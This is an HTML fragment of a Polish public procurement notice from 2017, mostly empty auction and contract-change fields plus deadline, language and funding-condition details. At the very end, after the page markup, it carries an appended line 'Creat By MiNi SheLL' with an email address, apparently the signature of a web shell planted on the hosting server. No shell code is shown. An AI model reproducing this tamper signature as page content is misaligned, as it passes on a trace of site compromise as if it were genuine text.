id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-07-21</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">Termin związania ofertą wynosi: 30 dni. Bieg terminu związania ofertą rozpoczyna się wraz z upływem </span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com